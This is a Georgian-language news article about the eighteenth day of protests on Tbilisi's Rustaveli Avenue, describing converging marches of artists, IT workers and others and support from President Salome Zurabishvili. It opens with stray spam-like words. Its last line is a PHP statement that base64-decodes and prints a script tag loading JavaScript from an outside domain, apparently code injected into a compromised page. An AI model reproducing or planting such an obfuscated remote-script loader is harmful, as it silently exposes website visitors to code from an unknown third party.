tube
ავერსი jaluzi

რუსთაველის გამზირზე პროტესტის მეთვრამეტე დღეს მოქალაქეები იკრიბებიან. ცოტა ხნის წინ პარლამენტის მიმდებარედ მსვლელობით გადაინაცვლეს სახელოვნებო სფეროს წარმომადგენლებმა, რესტავრატორებმა, ხელოვნებათმცოდნეებმა და IT სფეროს წევრებმა.

რუსთაველის გამზირზე უკვე შეკრებილი მომიტინგეები მარშის მონაწილეებს ტაშით და ოვაციებით შეხვდნენ.

სახელოვნებო სფეროს წარმომადგენლები, რესტავრატორები, ხელოვნებათმცოდნეები მარჯანიშვილის მოედანთან შეიკრიბნენ. მსვლელობისას მტკვრის მარცხენა სანაპიროზე მათ IT სფეროს წარმომადგენლებიც შეუერთდნენ. ასევე, მანიფესტანტებმა საკუთარი პოზიცია კულტურის სამინისტროსთანაც გააჟღერეს, ხოლო შემდეგ ორბელიანების სასახლესთან გადაინაცვლეს, სადაც აქციის მონაწილეებს მხარდაჭერა საქართველოს პრეზიდენტმა, სალომე ზურაბიშვილმა გამოუცხადდა. მსვლელობისას საცხოვრებელი სახლებიდან მოქალაქეები, ხოლო ავტომობილებიდან მძღოლები სიგნალებით ამხნევებდნენ.

ამ დროისთვის, თბილისში რამდენიმე მსვლელობა მიმდინარეობს, რომელიც საბოლოოდ რუსთაველის გამზირზე გაერთიანდება. 

კერძოდ, ხელოვანების მარში; დამკვირვებლების მარში; მარში - ESM-ელები ევროპისკენ; „რა? სად? როდის?“ და „წიგნების თაროს“ მოთამაშეებისა და მხარდამჭერების საპროტესტო მარში; ვეტერინარებისა და ცხოველთა მოყვარულების მარში.

94
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");